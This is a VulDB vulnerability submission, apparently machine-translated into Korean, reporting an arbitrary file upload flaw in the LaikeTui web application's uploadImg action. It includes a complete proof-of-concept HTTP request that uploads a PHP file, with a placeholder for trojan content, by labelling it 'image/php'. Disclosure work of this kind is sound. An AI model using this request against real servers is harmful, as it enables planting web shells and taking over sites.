제출 #203883: The web application has any file upload vulnerability in the background정보

제목The web application has any file upload vulnerability in the background
설명LKT/webapp/modules/system/actions/uploadImgAction.class.php 38 lines can be uploaded to php using content-type: image/php payload: POST /LKT/index.php?module=system&action=uploadImg HTTP/1.1 Host: Accept: */* Accept-Encoding: identity Cache-Control: no-cache Content-Type: multipart/form-data; boundary=--------------------------371918364269932091066326 Cookie: admin_mojavi=vn4tg0umd7hd63kfl1p44e61td User-Agent: PostmanRuntime-ApipostRuntime/1.1.0 Content-Length: 2106 ----------------------------371918364269932091066326 Content-Disposition: form-data; name="imgFile"; filename="PassWaf_3.php" Content-Type: image/php 木马内容 ----------------------------371918364269932091066326--
원천⚠️ https://github.com/bettershop/LaikeTui
사용자
 yuanshen (UID 53971)
제출2023. 09. 05. AM 08:34 (3 연령 ago)
모더레이션2023. 09. 15. AM 08:27 (10 days later)
상태수락
VulDB 항목239799 [Bettershop LaikeTui index.php?module=system&action=uploadImg imgFile 권한 상승]
포인트들20

Do you need the next level of professionalism?

Upgrade your account now!